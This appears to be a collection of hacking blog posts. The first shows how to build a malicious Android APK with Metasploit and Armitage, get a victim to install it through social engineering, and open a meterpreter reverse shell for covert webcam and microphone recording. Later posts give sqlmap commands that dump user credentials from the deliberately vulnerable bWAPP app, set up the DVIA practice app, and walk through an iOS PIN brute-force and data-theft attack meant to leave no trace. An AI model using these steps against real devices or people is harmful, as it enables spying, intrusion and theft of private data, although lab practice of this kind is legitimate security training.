Android Hacking with Armitage

Hi,

In this post I will show you how to get a remote shell on an android device using Armitage. Armitage is a graphical cyber attack management tool for Metasploit (one of my favorite hacking tools). If you want to learn more about Metasploit and Armitage then I suggest going here and here.

So let's start the demo. I will be using Kali Linux, you can follow the install instructions provided on the link above. The first thing we need to do is create a malicious APK file. APK stands for Android application package file and is quite simply a file format used to install and distribute software on android devices. We will use this malicious APK to open a remote shell on the target device allowing the attacker to send commands to it such as turning on the webcam or microphone.

APK File Creation

Once armitage opens you should see a console screen at the bottom. To create the malicious APK we can use the metasploit msfpayload command. For the LHOST you can enter the IP address of your machine (attacker) if you dont know your IP then you can do an ifconfig. You will also need a LPORT for this demo we are using 4444. You should now see the APK on your desktop or whatever location you have chosen. 

 Identifying The Target

We need to identify our target this can be done by running a scan of the network or by manually adding the host by selecting Hosts > Add Hosts. For this demo I know my Android smartphone is on 192.168.1.2 so I added it manually.

Sending APK To The Target

This part is up to you. In the real world it will need some social engineering to get the victim to install the app. For this demo I just attached it an email. Before we install the program we need to setup the listener on the attackers machine.


Attacker Setup

Now that the victim has successfully installed the app the attacker needs to set up a listener on their machine. We can do this through the console similar to above but Armitage makes it even easier by using the dropdown structure in the top right. Select exploit > multi > handler and double click.

 The multi/handler box should appear. You need to make two changes. The LPORT to 4444 and the payload to android/meterpreter/reverse_tcp. When this is done hit the launch button.

APK Installation

When the program is installing you will see the usual list of permissions. It will list quite quite a few as we want full control of the device. From an awareness point of view you should always check out the permissions before installing. For example if I am installing a calculator I need to ask myself why does it need to activate my webcam ;)

Once it has installed you should see an "M" logo on your device with the title MainActivity. You can take this a step further and change the logo picture and title using apktools. When you open the application you will see a button with reverse_tcp displayed on it again you can change this to make it more realistic.

When you click on this button this will create a remote session with the attackers machine.The target machine on Armitage should now turn red with a lightning effect!! At this point we can open a meterpreter prompt by right clicking on the host then selecting Meterpreter X > Interact > Meterpreter Shell

Another tab should open below with Meterpreter X as its title. We can now interact with the host. If you type "help" you will get a list of available commands. You can list the processes running or move about the various directories. At the bottom you should see record_mic and webcam options.

You can take a webcam_snap or stream. There is also capability to switch between front and back camera.

You can also turn on the microphone on for X seconds. The file will be saved in the usr/share/armitage folder as a sound.wav

record_mic -d 10 -f sound.wav -p false

 So that's it, by getting a user to install a malicious application an attacker can completely control the device.Happy Hacking :)

Exploiting SQL Injection with SQLmap

Hi, one tool I really like to use for exploiting SQLi is SQLmap. It is available here @ http://sqlmap.org/ and is also part of many distros such as Kali Linux and SamuraiWTF. It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

To demonstrate this powerful tool we will use bWAPP, the deliberately insecure web application. You can find more information here http://www.mmeit.be/bwapp/. bWAPP has over 70 vulnerabilities that you can use to sharpen your skills without fear of going to jail :)

Before we begin the demo we must first try and  understand what SQL Injection is. This type of attack occurs when an application takes untrusted data that is sent to an interpreter, in this case the database as part of a query. The attackers hostile data may then trick the interpreter into executing unintended commands. If untrusted data is used to construct SQL calls then the attacker will be able to modify the query to return data.

In order to protect against this attack developers must validate and escape the hostile data before it reaches the interpreter. This can be done using prepared statements or parametrized queries. I will go into SQLi in more detail in a later post.

So we have our vulnerable bWAPP page below. We know it is vulnerable because we have injected a single quote into the input field and it has returned a SQL error. From this we can deduce that the database is interpreting characters without proper validation.

If you look at the request below you will see that title is the vulnerable parameter, so this the one we must concentrate our attack on.

http://itsecgames.com/bWAPP/sqli_1.php?title='&action=search


The next thing to do is fire up SQLmap. For this demo I am using Kali Linux but you can run it in Windows or another distro. In Kali you can open up a terminal and simply type sqlmap. There are a lot of useful options in sqlmap you can check them out here https://github.com/sqlmapproject/sqlmap/wiki/Usage

The can now try and return some information. The command below will return all of the available database. The -u switch is the URL (note with the vulnerable title parameter), the cookie and the --dbs for enumerating the databases. I used the FireFox addon Cookie Manager to retrieve the cookie information but you can also run ZaProxy or Burp Suite to capture that information.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --dbs

We can see above that it has returned 3 databases. We can also return the current database users by using the command below:

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --users

Ok lets return the tables in the bWAPP database.The -D switch is for database and --tables returns the tables

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP --tables

We can see that there are 4 tables returned, the users table looks interesting so lets go a step further and return the columns from the users table.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users --columns

The last step for us is to dump out the data from the columns. You can select the interesting ones or dump all.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

We can also work on cracking the password hashes offline. So there you have it, a really useful tool for speeding up the exploitation of SQL Injection vulnerabilities.                  

                          
                            
                          

Test your iOS skills with DVIA

Hey,

If you are interested in testing your iOS penetration skills in a legal environment then the Damn Vulnerable iOS Application (DVIA) is for you available here @  http://damnvulnerableiosapp.com/. The application covers the most common security vulnerabilities found in iOS applications aligning with the OWASP Mobile Top 10.

 Vulnerabilities and Challenges

• Insecure Data Storage
• Jailbreak Detection
• Runtime Manipulation
• Piracy Detection
• Transport Layer Security
• Client Side Injection
• Information Disclosure
• Broken Cryptography
• Security Decisions via Untrusted input
• Side channel data leakage
• Application Patching

One of the ways to install the IPA is to use the IPA Installer Console

First download the IPA from the site here Download

Then copy the file over to your iOS device using sftp

sftp root@X.X.X.X

put DamnVulnerableIOSApp.ipa

Now run the command "ipainstaller DamnVulnerableIOSApp.ipa" or "installipa DamnVulnerableIOSApp.ipa" to install the application.

You should now see the application on the device

Happy Hacking :)

iOS Pin Guessing Attack

In this post I would like to talk about the threat posed by lost or stolen mobile devices.It is inevitable that devices will be misplaced it's human nature, right? Mobile devices are also a common target for theft. Device passcodes are seen as the first line of defense to prevent unauthorized access and subsequent data compromise.

The length and complexity of  the passcode will largely determine how successful this measure will be against the malicious user. When deciding on a passcode complexity policy we also have to take the user into consideration since they will have to  enter it each time they want to access the device.

In order to demonstrate the pitfalls of weak passcodes we will use the iPhone Data Protection Tools project http://code.google.com/p/iphone-dataprotection/. With these tools we can mount a PIN guessing attack against the device. The initial setup is quite complex and requires multiple steps but once this is done the actual attack is quite easy. You will need an iOS device sucepitble to jailbreaking e.g. 5.1.1 and a Mac.

Fortunately there is an easy to follow document provided by Joshua Wright available here http://www.willhackforsushi.com/ios-key-recovery.pdf . Once you have the installation and preparation done we can walk through the exploit.

The first step is to plug the device into the Mac via USB and let iTunes start. Next power off the device ensuring that it is completely turned off

Start redsn0w to jailbreak the device using the patched iOS firmware file, custom kernel and ramdisk you created during the preparation.

When redsn0w starts you will see the window below:

Click next and follow the steps on the menu

• Press and hold the suspend button for 3 seconds
• Without releasing the suspend button, press the home button for 10 seconds
• Release the suspend button but keep holding the home button for another 15 seconds

After a minute or two you should see OK on the device. This signals a successful exploit.

Now start an SSH listener on the device using the command below. The tcprelay.sh script is part of the iPhone Data Protection Tools.

At this point you can SSH into the iOS device using the following command (Note: the default password will be alpine).

The final step is to launch the bruteforce attack. The script will start to iterate through all the possible combinations i.e. 0000 - 9999 until it hits the correct number. The attack will not trigger a lockout as it bypasses the UI calling the low-level MKBUnlockDevice() kernel function. As you can see below the passcode has been returned as 0022

Using this technique an attacker could recover a 4 digit pin in 13 minutes on average, increasing the length to 6 digits dramatically increases the recovery time to 22 hours. If the user has a strong alphanumeric passcode then it cannot be brute forced in a reasonable amount of time meaning it gives the user the ability to initiate a device wipe.

Once the pin has been recovered it is then possible to decrypt the keybag and recover wireless keys etc. It will also be possible to do an iTunes backup containing the victims email, SMS and photos. The device can then be rebooted leaving no trace of the attack and returned to the victim if desired. Pretty scary stuff!!